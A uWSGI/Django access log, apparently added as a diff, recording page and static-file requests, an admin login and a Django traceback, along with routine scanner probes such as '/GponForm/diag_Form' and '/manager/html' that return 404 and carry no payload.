+[pid: 12823|app: -1|req: -1/1324] 219.228.146.150 () {38 vars in 717 bytes} [Tue Jan 12 13:00:11 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1325] 219.228.146.150 () {38 vars in 696 bytes} [Tue Jan 12 13:00:11 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1326] 219.228.146.150 () {38 vars in 712 bytes} [Tue Jan 12 13:00:11 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1327] 219.228.146.150 () {38 vars in 702 bytes} [Tue Jan 12 13:00:11 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1328] 219.228.146.150 () {38 vars in 721 bytes} [Tue Jan 12 13:00:12 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1329] 219.228.146.150 () {38 vars in 694 bytes} [Tue Jan 12 13:00:12 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1330] 219.228.146.150 () {38 vars in 710 bytes} [Tue Jan 12 13:00:12 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1331] 219.228.146.150 () {38 vars in 742 bytes} [Tue Jan 12 13:00:16 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1332] 219.228.146.150 () {34 vars in 547 bytes} [Tue Jan 12 13:00:16 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1333] 219.228.146.150 () {38 vars in 748 bytes} [Tue Jan 12 13:00:16 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: 0|req: 1009/1334] 219.228.146.150 () {50 vars in 928 bytes} [Tue Jan 12 13:00:24 2021] POST / => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 0)
+[pid: 12823|app: 0|req: 1010/1335] 219.228.146.150 () {40 vars in 797 bytes} [Tue Jan 12 13:00:24 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1011/1336] 219.228.146.150 () {40 vars in 799 bytes} [Tue Jan 12 13:00:24 2021] GET /home/ => generated 8644 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1012/1337] 219.228.146.150 () {40 vars in 808 bytes} [Tue Jan 12 13:00:32 2021] GET /publish => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1013/1338] 219.228.146.150 () {40 vars in 810 bytes} [Tue Jan 12 13:00:32 2021] GET /publish/ => generated 5083 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1014/1339] 219.228.146.150 () {40 vars in 799 bytes} [Tue Jan 12 13:00:43 2021] GET /home/ => generated 8644 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1015/1340] 219.228.146.150 () {40 vars in 812 bytes} [Tue Jan 12 13:00:53 2021] GET /all-0-0-0 => generated 9502 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: -1|req: -1/1341] 219.228.146.150 () {38 vars in 761 bytes} [Tue Jan 12 13:00:53 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1342] 219.228.146.150 () {38 vars in 833 bytes} [Tue Jan 12 13:00:53 2021] GET /static/img/t_photo/7_%E7%8E%A9%E5%85%B7%E8%BD%A6.jpg => generated 23084 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1343] 219.228.146.150 () {38 vars in 763 bytes} [Tue Jan 12 13:00:53 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1344] 219.228.146.150 () {38 vars in 857 bytes} [Tue Jan 12 13:00:53 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 65134 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: 0|req: 1016/1345] 219.228.146.150 () {40 vars in 799 bytes} [Tue Jan 12 13:01:00 2021] GET /home/ => generated 8644 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1017/1346] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 13:11:39 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[uwsgi-http key: client_addr: 61.219.11.153 client_port: 3583] hr_read(): Connection reset by peer [plugins/http/http.c line 917]
+[pid: 12823|app: 0|req: 1018/1347] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 13:51:50 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+invalid request block size: 34676 (max 4096)...skip
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 58.247.212.239 client_port: 64977] hr_instance_read(): Connection reset by peer [plugins/http/http.c line 647]
+[pid: 12823|app: 0|req: 1019/1348] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 14:36:23 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1020/1349] 31.57.34.202 () {28 vars in 403 bytes} [Tue Jan 12 15:15:05 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1021/1350] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 15:19:30 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1022/1351] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 15:58:44 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /config/getuser
+[pid: 12823|app: 0|req: 1023/1352] 209.141.60.195 () {36 vars in 618 bytes} [Tue Jan 12 16:27:00 2021] GET /config/getuser?index=0 => generated 3414 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1024/1353] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 16:38:13 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1025/1354] 92.38.46.104 () {28 vars in 402 bytes} [Tue Jan 12 16:52:06 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /index.html
+[pid: 12823|app: 0|req: 1026/1355] 205.185.120.128 () {40 vars in 684 bytes} [Tue Jan 12 16:57:22 2021] GET /index.html => generated 3394 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1027/1356] 83.97.20.21 () {26 vars in 277 bytes} [Tue Jan 12 17:15:02 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1028/1357] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 17:53:04 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1029/1358] 177.11.136.14 () {28 vars in 404 bytes} [Tue Jan 12 18:28:35 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1030/1359] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 18:30:35 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1031/1360] 101.32.181.171 () {22 vars in 235 bytes} [Tue Jan 12 18:51:33 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0)
+Not Found: /manager/html/
+[pid: 12823|app: 0|req: 1032/1361] 101.32.181.171 () {24 vars in 304 bytes} [Tue Jan 12 18:51:33 2021] GET /manager/html/ => generated 3404 bytes in 3 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1033/1362] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 19:10:33 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1034/1363] 177.84.40.106 () {28 vars in 402 bytes} [Tue Jan 12 19:22:48 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1035/1364] 187.57.71.226 () {28 vars in 403 bytes} [Tue Jan 12 19:35:09 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1036/1365] 187.57.71.226 () {28 vars in 402 bytes} [Tue Jan 12 19:35:09 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1037/1366] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 19:48:33 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1038/1367] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 20:25:29 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1039/1368] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 21:04:45 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response
+ self.check_response(response, callback)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response
+ "instead." % name
+ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead.
+[pid: 12823|app: 0|req: 1040/1369] 89.248.168.108 () {22 vars in 227 bytes} [Tue Jan 12 21:14:54 2021] HEAD / => generated 52529 bytes in 22 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1041/1370] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 21:46:35 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1042/1371] 185.36.81.49 () {28 vars in 381 bytes} [Tue Jan 12 22:09:25 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /GponForm/diag_Form
+[pid: 12823|app: 0|req: 1043/1372] 119.123.218.247 () {34 vars in 442 bytes} [Tue Jan 12 22:10:55 2021] POST /GponForm/diag_Form?images/ => generated 3423 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1044/1373] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 22:26:21 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1045/1374] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 23:04:20 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1046/1375] 190.115.189.74 () {22 vars in 235 bytes} [Tue Jan 12 23:08:55 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1)
+Not Found: /manager/html
+[pid: 12823|app: 0|req: 1047/1376] 190.115.189.74 () {24 vars in 302 bytes} [Tue Jan 12 23:08:55 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1048/1377] 103.87.172.175 () {22 vars in 236 bytes} [Tue Jan 12 23:11:01 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1)
+Not Found: /manager/html
+[pid: 12823|app: 0|req: 1049/1378] 103.87.172.175 () {24 vars in 302 bytes} [Tue Jan 12 23:11:02 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1050/1379] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 23:43:38 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1051/1380] 83.97.20.21 () {26 vars in 277 bytes} [Wed Jan 13 00:25:25 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+invalid request block size: 12879 (max 4096)...skip
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 58.247.212.239 client_port: 28368] hr_instance_read(): Connection reset by peer [plugins/http/http.c line 647]
+[pid: 12823|app: 0|req: 1052/1381] 45.76.144.219 () {32 vars in 381 bytes} [Wed Jan 13 01:11:09 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1053/1382] 83.97.20.21 () {26 vars in 278 bytes} [Wed Jan 13 01:48:30 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1054/1383] 128.14.133.58 () {30 vars in 436 bytes} [Wed Jan 13 02:07:26 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1055/1384] 83.97.20.21 () {26 vars in 278 bytes} [Wed Jan 13 02:30:04 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1056/1385] 83.97.20.21 () {26 vars in 277 bytes} [Wed Jan 13 03:09:39 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1057/1386] 47.97.98.208 () {22 vars in 234 bytes} [Wed Jan 13 03:51:46 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1058/1387] 125.165.105.99 () {28 vars in 411 bytes} [Wed Jan 13 04:08:53 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1059/1388] 65.60.11.210 () {30 vars in 435 bytes} [Wed Jan 13 04:25:28 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1060/1389] 83.97.20.21 () {26 vars in 278 bytes} [Wed Jan 13 04:28:00 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1061/1390] 83.97.20.34 () {26 vars in 278 bytes} [Wed Jan 13 04:49:33 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1062/1391] 83.97.20.21 () {26 vars in 278 bytes} [Wed Jan 13 05:08:29 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1063/1392] 219.228.146.132 () {36 vars in 681 bytes} [Wed Jan 13 05:31:13 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: -1|req: -1/1393] 219.228.146.132 () {38 vars in 708 bytes} [Wed Jan 13 05:31:13 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1394] 219.228.146.132 () {38 vars in 712 bytes} [Wed Jan 13 05:31:13 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1395] 219.228.146.132 () {38 vars in 730 bytes} [Wed Jan 13 05:31:13 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1396] 219.228.146.132 () {38 vars in 710 bytes} [Wed Jan 13 05:31:13 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1397] 219.228.146.132 () {38 vars in 716 bytes} [Wed Jan 13 05:31:13 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1398] 219.228.146.132 () {38 vars in 691 bytes} [Wed Jan 13 05:31:13 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1399] 219.228.146.132 () {38 vars in 689 bytes} [Wed Jan 13 05:31:13 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1400] 219.228.146.132 () {38 vars in 707 bytes} [Wed Jan 13 05:31:13 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1401] 219.228.146.132 () {38 vars in 705 bytes} [Wed Jan 13 05:31:13 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1402] 219.228.146.132 () {38 vars in 697 bytes} [Wed Jan 13 05:31:14 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1403] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 05:31:16 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1404] 219.228.146.132 () {38 vars in 736 bytes} [Wed Jan 13 05:31:16 2021] GET /static/img/favicon.ico => generated 1150 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: 0|req: 1064/1405] 219.228.146.132 () {48 vars in 893 bytes} [Wed Jan 13 05:32:48 2021] POST / => generated 27 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1065/1406] 219.228.146.132 () {40 vars in 864 bytes} [Wed Jan 13 05:32:48 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1066/1407] 219.228.146.132 () {40 vars in 866 bytes} [Wed Jan 13 05:32:48 2021] GET /home/ => generated 8644 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 12823|app: -1|req: -1/1408] 219.228.146.132 () {38 vars in 818 bytes} [Wed Jan 13 05:32:54 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: 0|req: 1067/1409] 219.228.146.132 () {40 vars in 883 bytes} [Wed Jan 13 05:32:58 2021] GET /single-an-1 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1068/1410] 219.228.146.132 () {40 vars in 885 bytes} [Wed Jan 13 05:32:58 2021] GET /single-an-1/ => generated 3045 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1069/1411] 219.228.146.132 () {40 vars in 879 bytes} [Wed Jan 13 05:33:09 2021] GET /all-0-0-0 => generated 9502 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: -1|req: -1/1412] 219.228.146.132 () {38 vars in 757 bytes} [Wed Jan 13 05:33:09 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 10 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1413] 219.228.146.132 () {38 vars in 756 bytes} [Wed Jan 13 05:33:09 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 10 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1414] 219.228.146.132 () {38 vars in 831 bytes} [Wed Jan 13 05:33:09 2021] GET /static/img/t_photo/7_%E7%8E%A9%E5%85%B7%E8%BD%A6.jpg => generated 23084 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1415] 219.228.146.132 () {38 vars in 855 bytes} [Wed Jan 13 05:33:09 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 65134 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: 0|req: 1070/1416] 219.228.146.132 () {40 vars in 881 bytes} [Wed Jan 13 05:33:15 2021] GET /single/6 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1071/1417] 219.228.146.132 () {40 vars in 883 bytes} [Wed Jan 13 05:33:15 2021] GET /single/6/ => generated 8794 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: -1|req: -1/1418] 219.228.146.132 () {38 vars in 903 bytes} [Wed Jan 13 05:33:15 2021] GET /static/img/r_photo/3_%E6%96%87%E6%9C%AC%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%B8%B8%E7%94%A8%E6%A0%87%E7%AD%BE.png => generated 110927 bytes in 6 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 12823|app: 0|req: 1072/1419] 219.228.146.132 () {40 vars in 879 bytes} [Wed Jan 13 05:33:29 2021] GET /publish => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1073/1420] 219.228.146.132 () {40 vars in 881 bytes} [Wed Jan 13 05:33:29 2021] GET /publish/ => generated 5083 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1074/1421] 219.228.146.132 () {38 vars in 814 bytes} [Wed Jan 13 05:39:20 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1075/1422] 219.228.146.132 () {40 vars in 872 bytes} [Wed Jan 13 05:39:26 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1076/1423] 219.228.146.132 () {40 vars in 874 bytes} [Wed Jan 13 05:39:26 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /favicon.ico
+[pid: 12823|app: 0|req: 1077/1424] 219.228.146.132 () {38 vars in 767 bytes} [Wed Jan 13 05:39:26 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1078/1425] 219.228.146.132 () {48 vars in 964 bytes} [Wed Jan 13 05:39:39 2021] POST /my-admin/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1079/1426] 219.228.146.132 () {40 vars in 885 bytes} [Wed Jan 13 05:39:39 2021] GET /admin-home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1080/1427] 219.228.146.132 () {40 vars in 887 bytes} [Wed Jan 13 05:39:39 2021] GET /admin-home/ => generated 9586 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: -1|req: -1/1428] 219.228.146.132 () {38 vars in 821 bytes} [Wed Jan 13 05:39:39 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1429] 219.228.146.132 () {38 vars in 755 bytes} [Wed Jan 13 05:39:39 2021] GET /static/css/style.css => generated 118751 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1430] 219.228.146.132 () {38 vars in 767 bytes} [Wed Jan 13 05:39:39 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1431] 219.228.146.132 () {38 vars in 784 bytes} [Wed Jan 13 05:39:39 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1432] 219.228.146.132 () {38 vars in 796 bytes} [Wed Jan 13 05:39:39 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1433] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 05:39:39 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
